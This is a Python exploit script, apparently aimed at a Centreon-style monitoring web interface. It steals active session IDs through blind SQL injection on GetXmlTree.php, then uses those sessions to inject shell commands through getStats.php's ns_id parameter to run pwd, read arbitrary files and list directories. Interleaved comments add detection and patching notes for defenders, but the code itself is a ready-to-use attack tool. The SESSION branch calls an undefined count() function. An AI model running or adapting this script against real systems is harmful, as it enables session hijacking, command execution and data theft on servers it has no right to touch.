#!/bin/env python
import blindinject
import sys
import urllib2, ssl
# TLS context passed to the urllib2 requests in the PWD, CAT and LS branches.
# Hostname checking and certificate validation are both switched off, so the
# peer's identity is never verified and the connection can be intercepted.
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
def usage():
    """Print the command-line synopsis and terminate with exit status 1."""
    help_lines = [
        'Usage: python %s <root> ACTION [...]' % sys.argv[0],
        ' ACTIONS:',
        ' SESSION',
        ' PWD <session>',
        ' CAT <session> <file>',
        ' LS <session> <file | directory>',
        '',
    ]
    # A single joined write emits the same lines as one print per entry.
    print '\n'.join(help_lines)
    sys.exit(1)
# Both <root> and ACTION are mandatory; bail out before indexing sys.argv.
if len(sys.argv) < 3:
    usage()
# ROOT is the URL prefix every request in this script is built on.
ROOT, ACTION = sys.argv[1], sys.argv[2]
# Any action outside the four supported ones ends in the usage text.
if ACTION not in ('SESSION', 'PWD', 'CAT', 'LS'):
    usage()
# SESSION: boolean-based blind SQL injection against the `sid` query parameter
# of GetXmlTree.php, used to read `session_id` values via the external
# `blindinject` helper. The helper is not part of this file, so the meaning of
# its positional arguments below is inferred, not confirmed.
#
# Defender notes:
#   - The injected value closes a quoted string and appends a sub-select, which
#     suggests `sid` reaches a SQL statement without parameter binding
#     (inferred from the payload; the server code is not shown here).
#   - In web-server access logs, look for GetXmlTree.php requests whose `sid`
#     contains a quote, `SELECT`, or `%23`; blind extraction typically shows up
#     as a long burst of near-identical requests from one client.
#   - Fix on the server side with bound parameters for `sid`, upgrade to a
#     release that contains the vendor fix, and keep the web UI off untrusted
#     networks. Rotate any sessions that may have been read.
if ACTION == 'SESSION':
    ''' SQLInjector parameters & callbacks '''
    # Column to extract and the WHERE clause ('1' matches every row).
    cols = ['session_id']
    addWhere = '1'
    def patternCB(res):
        # True/false oracle: True when the response does not contain the
        # text 'Fatal error'.
        return res.find('Fatal error')==-1
    def simpleURLencode(url):
        # Percent-encodes only spaces and '#'; every other character is
        # passed through unchanged.
        return url.replace(' ', '%20').replace('#', '%23')
    ''' CODE '''
    # Arguments: target URL ending in `sid=`, payload prefix, payload suffix,
    # an empty string, the oracle callback and the encoder callback.
    SI = blindinject.SQLInjector(ROOT + '/include/common/XmlTree/GetXmlTree.php?sid=', '0\' OR (SELECT COUNT(*) FROM (', ') AS res2)=1#', '', patternCB, simpleURLencode)
    # presumably 'centreon' is the database and 'session' the table -- confirm
    # against blindinject; the meaning of `1` and `True` is not visible here.
    BBlist = blindinject.BlindBuild(SI, 1, 'centreon', 'session', cols, addWhere, True)
    dumplist = BBlist.run()
    # NOTE(review): `count` is neither defined nor imported in this file.
    if count(dumplist)==0:
        print 'No session active in database, try later...'
        sys.exit(2)
    for line in dumplist:
        print 'Session found: %s' % line['session_id']
# PWD: one GET to getStats.php carrying the supplied session id, with
# `key=cmd_buffer` and an `ns_id` value of "|pwd "; the raw response body is
# printed.
#
# Defender notes:
#   - The leading pipe in `ns_id` indicates OS command injection: the endpoint
#     appears to place the parameter on a shell command line unvalidated
#     (inferred from the request shape; the server code is not shown here).
#   - The request carries a `session_id`, so the endpoint presumably requires
#     a live session -- confirm.
#   - In access logs, look for getStats.php requests whose `ns_id` contains
#     `|` (or `%7C`) or other shell metacharacters.
#   - Fix on the server side by validating `ns_id` strictly and escaping shell
#     arguments; upgrade to a release that contains the vendor fix.
if ACTION == 'PWD':
    if len(sys.argv)<4:
        usage()
    SESSION = sys.argv[3]
    # SESSION is concatenated into the URL verbatim, with no URL-encoding.
    res = urllib2.urlopen(ROOT + '/include/Administration/corePerformance/getStats.php?session_id=' + SESSION + '&key=cmd_buffer&ns_id=|pwd%20', context=ctx).read()
    print res
# CAT: same getStats.php request shape as the PWD action, with `ns_id` set to
# "|cat <file> "; the response is printed with its last nine lines removed.
#
# Defender notes:
#   - A pipe followed by a command in `ns_id` indicates OS command injection
#     in the endpoint (inferred from the request shape, not from server code).
#     The observable effect here is disclosure of any file readable by the
#     account the web application runs as.
#   - In access logs, look for getStats.php requests whose `ns_id` contains
#     `|` (or `%7C`) or file paths.
#   - Fix on the server side by validating `ns_id` strictly and escaping shell
#     arguments; upgrade to a release that contains the vendor fix.
if ACTION == 'CAT':
    if len(sys.argv)<5:
        usage()
    SESSION = sys.argv[3]
    FILE = sys.argv[4]
    # SESSION and FILE are concatenated into the URL verbatim, no URL-encoding.
    res = urllib2.urlopen(ROOT + '/include/Administration/corePerformance/getStats.php?session_id=' + SESSION + '&key=cmd_buffer&ns_id=|cat%20'+FILE+'%20', context=ctx).read()
    # Drops the final nine lines of the body -- presumably page output that
    # follows the command output; confirm against a real response.
    print '\n'.join(res.split('\n')[:-9])
# LS: same getStats.php request shape as the PWD and CAT actions, with `ns_id`
# set to "|ls -al <target> "; the response is printed from its ninth line on.
#
# Defender notes:
#   - A pipe followed by a command in `ns_id` indicates OS command injection
#     in the endpoint (inferred from the request shape, not from server code).
#     The observable effect here is a directory listing taken with the
#     privileges of the web application account.
#   - In access logs, look for getStats.php requests whose `ns_id` contains
#     `|` (or `%7C`) or other shell metacharacters.
#   - Fix on the server side by validating `ns_id` strictly and escaping shell
#     arguments; upgrade to a release that contains the vendor fix.
if ACTION == 'LS':
    if len(sys.argv)<5:
        usage()
    SESSION = sys.argv[3]
    TGT = sys.argv[4]
    # SESSION and TGT are concatenated into the URL verbatim, no URL-encoding.
    res = urllib2.urlopen(ROOT + '/include/Administration/corePerformance/getStats.php?session_id=' + SESSION + '&key=cmd_buffer&ns_id=|ls%20-al%20'+TGT+'%20', context=ctx).read()
    # Skips the first eight lines of the body -- presumably page output that
    # precedes the command output; confirm against a real response.
    print '\n'.join(res.split('\n')[8:])